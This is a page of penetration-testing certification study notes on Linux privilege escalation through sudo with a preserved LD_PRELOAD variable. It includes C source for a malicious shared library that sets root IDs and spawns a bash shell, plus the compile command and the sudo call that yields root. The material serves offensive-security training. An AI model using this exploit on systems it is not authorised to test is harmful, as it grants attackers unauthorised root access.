OSCP-CPTS NOTES
TwitterGithubLinkedinInstagramDiscord
  • oscp-cpts-notes
  • Pivoting & Tunneling
    • Local Port Forwarding
    • Remote Port Forwarding
    • Dynamic Port Forwarding
    • Ligolo-ng
  • Linux Privilege Escalation
    • Gathering Information of the System
    • Capabilities
    • Group Based
    • SUID Privilege Escalation
    • Cron Job
    • Exploiting NFS weak Permission
    • Sudo + LD_PRELOAD (Shared Libraries)
    • Shared Object Manipulation
    • Python Library Hijacking
  • Windows Privilege Escalation
    • Gathering Information of the System
    • User Privileges
      • SeImpersonatePrivilege and SeAssignPrimaryToken
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
    • Group Privileges
      • Backup Operators
      • DnsAdmins
      • Server Operators
      • Always Install Elevated
      • Print Operators
      • Event Log Readers
      • Hyper-V Administrators
    • Credential Theft
  • Active Directory Attacks
    • Enumeration
    • Initial Foothold
    • Gathering Users & Password Policies
    • Password Spraying
    • Credentialed Enumeration From Linux
    • Credentialed Enumeration From Windows
    • Kerberoasting - From Linux
    • Kerberoasting - From Windows
  • Beyond OSCP - CPTS
    • RED TEAMING
      • Windows Local Persistence
        • Tampering With Unprivileged Accounts
        • Backdooring Files
        • Abusing Services
        • Abusing Scheduled Tasks
        • Logon Triggered Persistence
        • Backdooring the Login Screen / RDP
        • Persisting Through Existing Services
Powered by GitBook
On this page
  • Understanding the Context:
  • Example User
  • Attack Scenario
  • Creating malicious shared libraries

Was this helpful?

Edit on GitHub
  1. Linux Privilege Escalation

Sudo + LD_PRELOAD (Shared Libraries)

For this attack, we need user with sudo access to run some command (can be any command) + LD_PRELOAD variable to persist with sudo call.

Shared libraries are collections of precompiled code that can be used by multiple programs simultaneously. They provide a way to modularize code, allowing functions and data to be shared across different applications without the need to duplicate the code.

LD_PRELOAD: An environment variable used in Unix-like operating systems to specify a shared library to be loaded before others when a program is run. It can be used to override functions in standard libraries.

Understanding the Context:

  • If a user has permission to run a program with sudo, but that program calls functions from shared libraries (like libc), you can use LD_PRELOAD to inject your own shared library that modifies the behavior of these functions.

Example User

user@pc1:~$ sudo -l
Matching Defaults entries for dollarboysushil on pc1:
    env_reset, mail_badpass,................................. ,env_keep+=LD_PRELOAD

User dollarboysushil may run the following commands on pc1 :
    (root) NOPASSWD: /usr/bin/ping

Attack Scenario

From above example, we can see user dollarboysushil can use ping command as root without root's password. Also, we can see env_keep+=LD_PRELOADwhich means environment variable are preserver when using sudo.

For the attack, We are going to craft a malicious shared libraries, then we will include this malicious shared library with the LD_PRELOADvariable. Then when we run sudo ping, we will be able to load our malicious shared libraries.

Creating malicious shared libraries

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

in above malicious.c file, we are unsetting our environment variable (LD_PRELOAD), then we are setting our gid and uid to 0 (root) and then we are spawning bash shell

Compiling this malicious.c

user@pc1 $: gcc -fPIC -shared -o malicious.so malicious.c -nostartfiles

Here, we are compiling our malicious.c code into shared library file, malicious.so

Then when we run ping as sudo,

user@pc1 $: sudo LD_PRELOAD=/locatio_of_malicious_library/malicious.so /usr/bin/ping
root@pc2 #: whoami
root

We are now, root

PreviousExploiting NFS weak PermissionNextShared Object Manipulation

Last updated 7 months ago

Was this helpful?

Watch this excellent video by conda.

https://youtu.be/bzjnIi5u9OQ?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWV